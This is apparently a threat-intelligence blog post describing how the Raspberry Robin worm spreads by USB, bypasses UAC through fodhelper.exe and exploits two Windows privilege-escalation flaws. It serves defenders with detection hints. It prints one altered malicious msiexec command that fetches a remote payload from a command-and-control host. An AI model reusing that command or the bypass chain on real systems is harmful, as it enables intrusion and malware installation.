SOCRadar® Cyber Intelligence Inc. | Hundreds of Windows Networks are Infected with Raspberry Robin Worm

Resources

Tem 04, 2022

19 Mins Read

Hundreds of Windows Networks are Infected with Raspberry Robin Worm

[Update] February 12, 2024: “Raspberry Robin Malware Advances with New One-Day Exploits”

Microsoft reported that hundreds of businesses’ networks have already been compromised by the Windows worm Raspberry Robin.

Multiple security experts discovered Raspberry Robin in 2021. Microsoft even saw evidence from 2019. Raspberry Robin acts like a worm and is installed via external devices (such as USB flash drives). It gains access through msiexec.exe, which is utilized to install malicious DLL files.

YARA rules on DLL detection are found on GitHub.

Raspberry Robin frequently compromises QNAP NAS devices by using HTTP requests containing the victim’s hostname and using them as C2 servers. Raspberry Robin was also using TOR output nodes as an extra C2 infrastructure.

Microsoft privately disclosed the Raspberry Robin risks to Defender for Endpoint subscribers.

How Does Raspberry Robin Work?

The malware is delivered by infected USB drives that include an [.]LNK file. When a user clicks on this file, the worm launches another malicious file by starting a msiexec[.]exe process in Command Prompt.

It then uses a short URL to communicate with command and control servers (C2).

When the connection is successful, it downloads and installs other malicious DLLs that try to communicate with Tor nodes. rundll32[.]exe, regsvr32[.]exe, and dllhost[.]exe are used to connect to an external network (C2 servers). DLLs are suspected of being used to gain persistence on compromised systems. There are two examples on VirusTotal:

Raspberry Robin executes DLLs with the help of two legitimate Windows utilities:

fodhelper[.]exe (Bypasses UAC)
odbcconf[.]exe (Executes and configures the DLLs)

fodhelper[.]exe spawns rundll32[.]exe to execute a malicious command. This gives rundll32[.]exe the ability to run with elevated admin privileges and bypass UAC. It is unusual for fodhelper[.]exe to act as the parent process and spawn another, so if behavior is observed, it could help detect Raspberry Robin. rundll32[.]exe then calls odbcconf[.]exe, which allows configuring the installed malicious DLLs.

The filename structure is distinctive. A number of file extensions and five to seven randomly selected alphanumeric characters make up the filename; .usb, .ico, .lnk, .bin, .sv, and .lo are a few of the file extensions that has been seen. Additionally, the command occasionally included type, a built-in command to display a file’s contents.

Raspberry Robin uses mixed-case letters to evade detection because cmd[.]exe is case-insensitive.

The malicious URLs usually contain the non-standard HTTP web service port 8080.

Here is an altered example of a complete malicious Raspberry Robin msiexec[.]exe command line that satisfies the abovementioned requirements. The victim’s hostname has been changed to HOSTNAME in the modified random string.

MSiexEc /q-I “htTP://MwGQ.nEt:8080/l5cnhZV6KA/HOSTNAME”

Raspberry Robin Malware Advances with New One-Day Exploits

Researchers report that the Raspberry Robin malware has incorporated two new one-day exploits to its operations.

These exploits indicate a significant advancement in the threat’s capabilities. Experts speculate that the operators behind Raspberry Robin may have obtained these exploits from an external source, suggesting a potential partnership with exploit sellers or the direct involvement of the malware authors in exploit development.

Recent observations indicate that Raspberry Robin continues to refine its features and enhance evasion techniques. Notably, the malware has adapted its communication methods and lateral movement strategies to avoid detection by security measures.

Furthermore, Raspberry Robin has adopted a new tactic of utilizing the Discord platform to distribute malicious archive files, disguising them as legitimate Windows components.

Upon execution, Raspberry Robin employs a series of one-day exploits to elevate privileges on the compromised device. Its latest campaign leverages exploits targeting CVE-2023-36802 (CVSS: 7.8, High) and CVE-2023-29360 (CVSS: 8.4, High), both Local Privilege Escalation (LPE) vulnerabilities in Microsoft Streaming Service Proxy.

Vulnerability card for CVE-2023-36802 (SOCRadar Vulnerability Intelligence)

Vulnerability card for CVE-2023-29360 (SOCRadar Vulnerability Intelligence)

The timeline of exploitation for these vulnerabilities indicates a strategic approach by Raspberry Robin operators. They initiated exploitation shortly after the vulnerabilities were disclosed, suggesting access to advanced exploit resources and proactive targeting strategies.

According to researchers, the timeline of exploitation for the vulnerabilities is as follows:

CVE-2023-29360

Publicly disclosed on June 13, 2023,
Raspberry Robin started exploiting it at the start of August 2023,
The first GitHub exploit of the vulnerability was released on September 24, 2023.

CVE-2023-36802

Publicly disclosed on September 12, 2023,
Raspberry Robin started exploiting it at the start of October 2023,
The first GitHub exploit of the vulnerability was released on October 10, 2023.

The utilization of 64-bit external executables for the exploits suggests a distinct separation between the exploit development process and Raspberry Robin’s core components. This separation, along with other technical indicators, reinforces the likelihood of the malware’s operators procuring these exploits from external sources.

For IOCs observed in the latest Raspberry Robin campaigns, check here